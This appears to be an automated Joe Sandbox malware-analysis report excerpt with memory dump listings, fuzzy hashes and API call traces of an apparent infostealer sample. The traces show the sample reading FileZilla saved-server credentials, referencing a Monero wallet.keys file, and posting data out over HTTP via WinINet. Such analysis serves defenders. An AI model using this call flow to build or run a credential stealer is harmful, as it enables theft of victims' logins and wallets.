                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: foE
                    • API String ID: 0-1674453201
                    • Opcode ID: ec8cd656d07a97354e9cb3455b2108a9b8500765e12d01b6dd36e0ce6bba99b4
                    • Instruction ID: 14d0a5d532dfe05103c79cf0f6b1039b075b3d92790e77ac616ac356d9f0b0f6
                    • Opcode Fuzzy Hash: ec8cd656d07a97354e9cb3455b2108a9b8500765e12d01b6dd36e0ce6bba99b4
                    • Instruction Fuzzy Hash: 475187F740C300DFDB066E2AECA277EBBE5DB54220F15492FEAC246744F5B559019283
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 6Q^_
                    • API String ID: 0-1184235609
                    • Opcode ID: 87ff9da0c8d2f4c85a16e38709d56509b4a1ac9dfe93dba0262360759a7d98be
                    • Instruction ID: 8691012eea41d9a46fcc9ed862d602b20dddaf2b97ea04194a03d8966caa9746
                    • Opcode Fuzzy Hash: 87ff9da0c8d2f4c85a16e38709d56509b4a1ac9dfe93dba0262360759a7d98be
                    • Instruction Fuzzy Hash: 294127F3A182045FF304A97CED9976BB79AD7D4324F1A863DEB85C7384E97988014241
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13292fbdd8fb7b6ff93849d15a949d55534a058f0f9aa3aa87a89fc90f8aa1cf
                    • Instruction ID: 3a7b174eece0292f20de5f45ecd42f2f1b4107c8d9d9d4d9d70974758e39fe67
                    • Opcode Fuzzy Hash: 13292fbdd8fb7b6ff93849d15a949d55534a058f0f9aa3aa87a89fc90f8aa1cf
                    • Instruction Fuzzy Hash: 466148F390C214ABE3046E3DDD8567ABBE8EB54720F1A463DEEC893744F9359D048292
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8adf6f78e77fd38eaccbde5888988921d893ab1bcb3096afd0a709e9787b7c44
                    • Instruction ID: ce012f108cf68d41d607498fc30bb45e71f25fe062a965601dcb76100617cab1
                    • Opcode Fuzzy Hash: 8adf6f78e77fd38eaccbde5888988921d893ab1bcb3096afd0a709e9787b7c44
                    • Instruction Fuzzy Hash: 705104B3D082109BE319EE29DC52A7BF7E5EF94720F16893DDAC593340EA3558018687
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 511f33187112f9c630d2aed2ac45fc3a14933a55a742972a4518ff062a7822df
                    • Instruction ID: 61db2a3b0d7bc0a71e144d2c118cf0f6b2abcfa75843a7cb05206cb9d2b27fec
                    • Opcode Fuzzy Hash: 511f33187112f9c630d2aed2ac45fc3a14933a55a742972a4518ff062a7822df
                    • Instruction Fuzzy Hash: 085144B390D614CFD204AF29DD4463EB6E9EBD4790F16892EDAC68B704EA3158418783
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c53f7c9ab42f01bae4a63d16f295f9bd631ef80df7a99a3729f4305db3213076
                    • Instruction ID: 751c835d24f8a08cef148e2c9a39761c3e85362ece8cd5a57d7fbfca5a656cb1
                    • Opcode Fuzzy Hash: c53f7c9ab42f01bae4a63d16f295f9bd631ef80df7a99a3729f4305db3213076
                    • Instruction Fuzzy Hash: 94415EF3B081005BE7085E29ED92BBBB7D6EBD4361F26813ED6C5C3384ED7558058692
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a67a8644121dce69ead6947dfafb0d465ba2dc7658eed5dd21a1757bde228c9e
                    • Instruction ID: 4519bf4d1bef6e9aeff94aa8281b62d5c57d1ed104b9a344972ae7ae9eda1a70
                    • Opcode Fuzzy Hash: a67a8644121dce69ead6947dfafb0d465ba2dc7658eed5dd21a1757bde228c9e
                    • Instruction Fuzzy Hash: 4121D5B350C7149FE701AE1ADC856BAFBE5EF88220F068A2DEAD443B04D635684186C7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00BE0DBA,00BE0DB7,00BE0DB6,00BE0DB3), ref: 00BD0362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD0369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BD0385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BD03CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD03DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00BD0419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BD0463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD0532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BD0562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00BD0571
                    • lstrcat.KERNEL32(?,url: ), ref: 00BD0580
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD0593
                    • lstrcat.KERNEL32(?,00BE1678), ref: 00BD05A2
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD05B5
                    • lstrcat.KERNEL32(?,00BE167C), ref: 00BD05C4
                    • lstrcat.KERNEL32(?,login: ), ref: 00BD05D3
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD05E6
                    • lstrcat.KERNEL32(?,00BE1688), ref: 00BD05F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00BD0604
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD0617
                    • lstrcat.KERNEL32(?,00BE1698), ref: 00BD0626
                    • lstrcat.KERNEL32(?,00BE169C), ref: 00BD0635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BE0DB2), ref: 00BD068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: dbfac29bdb92a93620c6e6848029c0baa7bdc265f835c27def7c5c18ec4d91d0
                    • Instruction ID: 64257bb1a9613ea6ccff80c08931508e4af7a0b4b05a93c91b60bb09ee6419cc
                    • Opcode Fuzzy Hash: dbfac29bdb92a93620c6e6848029c0baa7bdc265f835c27def7c5c18ec4d91d0
                    • Instruction Fuzzy Hash: 7CD150719102089FCB04FBE4DD96EEEB3B8EF14300F5485A9F502B6191EF75AA49CB61
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BC59F8
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC5A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC5B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013CEAC8,00000000,?,013CA780,00000000,?,00BE1A1C), ref: 00BC5E71
                    • lstrlen.KERNEL32(00000000), ref: 00BC5E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BC5E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC5E9A
                    • lstrlen.KERNEL32(00000000), ref: 00BC5EAF
                    • lstrlen.KERNEL32(00000000), ref: 00BC5ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BC5EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00BC5F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BC5F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BC5F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FBD
                    • HttpOpenRequestA.WININET(00000000,013CEA18,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC5BF8
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • InternetCloseHandle.WININET(00000000), ref: 00BC5FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------$de-DE
                    • API String ID: 874700897-1932956479
                    • Opcode ID: cc9136a9bad73b44333713cc3ef977cdab795c356be2540a317e122520f98268
                    • Instruction ID: 4c8f7c235716f2649b1f1f6e6f58d31fb78a8aa4043b7f96724586f76434fbfb
                    • Opcode Fuzzy Hash: cc9136a9bad73b44333713cc3ef977cdab795c356be2540a317e122520f98268
                    • Instruction Fuzzy Hash: 90121E71820118AADB15EBA0DC95FEEF3B8BF14700F5041EAB50672191FF712A89DF65
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
